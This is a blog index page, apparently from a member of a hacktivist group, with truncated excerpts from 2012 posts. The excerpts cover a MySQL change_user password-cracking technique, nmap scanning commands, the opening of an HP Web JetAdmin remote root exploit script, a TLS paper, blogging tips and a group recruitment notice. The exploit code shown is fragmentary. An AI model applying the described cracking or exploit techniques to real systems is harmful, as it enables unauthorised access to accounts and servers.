Thursday, December 13, 2012

MySQL multiple security vulnerabilities

Description: Buffer overflows, information leakage, privilege escalation, DoS.
Affected: MYSQL : MySQL 5.5


Document: 
   FAST Cracking of MySQL account passwords locally or over the network (post-auth) 
(to the maintainers: you don't need to patch this, looks a lot like a minor bug, prolly documented :D) 
I found a method to crack mysql user passwords locally or over the network pretty efficiently. During tests it was possible to test 5000 passwords per second over the network. The method is as follows: 
The attacker logs into the mysql server with an unprivileged account. There is a command in mysql called change_user; this command can be used, as the name suggests, to change a user during a mysql session. Since mysql is very fast in doing this, it is much more powerful to crack passwords this way rather than reconnecting every time to the mysql server to brute force passwords (which would be VERY slow). Since the SALT does not change (and this is the weak point) in the change_user command, it is a convenient way to crack passwords. (When connecting to mysql, in each connection attempt the SALT is always different and sent out by the server.) 
Below is an example script and an example which uses John the Ripper's capabilities to generate passwords. 
The password "pass" for the user "crackme" is cracked in a matter of seconds. (About 100000 passwords are tested in 20 seconds.)
--- cracking script 
use Net::MySQL; 

Saturday, December 8, 2012

Useful Nmap Commands for Hackerz. :D


#1: Scan a single host or an IP address (IPv4)

### Scan a single ip address ###
nmap 192.168.1.1
 
## Scan a host name ###
nmap server1.cyberciti.biz
 
## Scan a host name with more info ###
nmap -v server1.cyberciti.biz
 
Sample outputs:
Fig.01: nmap output

#2: Scan multiple IP addresses or a subnet (IPv4)

nmap 192.168.1.1 192.168.1.2 192.168.1.3
## works with same subnet i.e. 192.168.1.0/24
nmap 192.168.1.1,2,3
You can scan a range of IP addresses too: ...

Monday, October 1, 2012

Join Bangladesh Cyber Army and work for the country (application rules)

It is hereby announced to everyone that new members will be recruited into the Bangladesh Cyber Army. Because the recruitment policy has changed extensively, all previous recruitment procedures and policies are suspended indefinitely, and we have decided to bring a number of new people into our group, through whom our group will perhaps become better organized and stronger than before. We hope to have with us on this journey all those who wish to work with the Bangladesh Cyber Army for the country and the country's cyberspace.


Wednesday, September 19, 2012

HP Web JetAdmin 6.5 Remote Root Exploit

#!/usr/bin/perl

use IO::Socket;
#
# This is an exploit for HP Web JetAdmin, the printer management server from HP.
# It is NOT about printers! The service usually runs on port 8000 on Windows,
# Solaris or Linux boxes.
#
# Greetz: The Phenoelit People, c-base crew, EEyE (rock!), Halvar on the other
#         side of the planet, Johnny, Andreas, Lisa, H D Moore, Nicolas
#         Fishbach and all the others I forgot
#
$|=1;
die "Specify server name or IP\n" unless ($host=shift);
#
# lala stuff
#

Tuesday, September 18, 2012

TLS / SSLv3 renegotiation vulnerability Paper


TLS / SSLv3 renegotiation vulnerability explained. 

  This paper explains the vulnerability for a broader audience and summarizes the information that is currently available. The document is subject to updates and is believed to be accurate at the time of writing.

Wednesday, June 13, 2012

Blogging Tips and Tricks



1. Increase your blog traffic

The first thing that you need to focus on is actually not how to get many subscribers to your blog, but how to increase your blog traffic. More traffic means more opportunity to get more subscribers to your blog. With less traffic, you can’t expect to get many blog subscribers. So, you should actively increase your blog traffic by various means such as guest posting, blog commenting, forum marketing, article marketing, video marketing, and so on.

2. Create a separate squeeze page

If you want to seriously attract subscribers to your blog, create a squeeze page where you can exclusively promote your blog to your readers. Entice them to subscribe to your blog and give them free stuff if necessary. If you only ask them to subscribe for your blog’s daily updates, you probably don’t need to do it. However, if you want to build a mailing list for your blog, it is a necessary step because it will increase your chance of converting your blog readers into subscribers.

Sunday, March 4, 2012

Official Blog of JingoBD

Hello All..
I am JingoBD from Bangladesh Cyber Army.
Actually I want a place where I can share my ideas.  ... And welcome to my blog. Thanks for visiting.